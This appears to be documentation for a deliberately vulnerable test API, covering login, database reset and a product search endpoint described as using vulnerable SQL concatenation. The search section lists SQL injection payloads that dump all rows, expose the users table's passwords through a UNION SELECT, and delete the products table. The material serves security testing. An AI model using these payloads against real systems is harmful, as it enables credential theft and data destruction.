Search
K
Normal Simple API

User Login

Authenticate user and receive session token

post
https://kong.nonamesec.org/normal/login

Body

application/json
emailstring(email)required

Example:sergio@company.com

passwordstring(password)required

Example:SuperSecret123!

Response

200 application/json

Login successful

successboolean

Example:true

messagestring

Example:Login successful

session_tokenstring

Example:a2cbce88465d6b36229e48e11f186e89b31aec7c79643cadb442a565ff546b6

userobject
Show Child Parameters
post/normal/login

Body

{ "email": "sergio@company.com", "password": "SuperSecret123!" }
 
200 application/json

Database

Database operations

Reset Database

Reinitializes database with default data

get
https://kong.nonamesec.org/normal/db/restart

Response

200 application/json

Database reset successful

messagestring

Example:Database restarted

get/normal/db/restart
 
200 application/json

Database Search

Searches products database using vulnerable SQL query concatenation

get
https://kong.nonamesec.org/normal/db/search

Query Parameters

querystring

Search term

Expected value: RAM

For testing SQL injection:

  • Extract all products: %’ OR ‘1’='1
  • Expose users table: %’ UNION SELECT id, user, password, ‘EXPOSED’ FROM users–
  • Delete all products: %'; DELETE FROM products–

Default:RAM

Example:RAM

Response

200 application/json

Search results

resultsarray[object]
Show Child Parameters
get/normal/db/search
 
200 application/json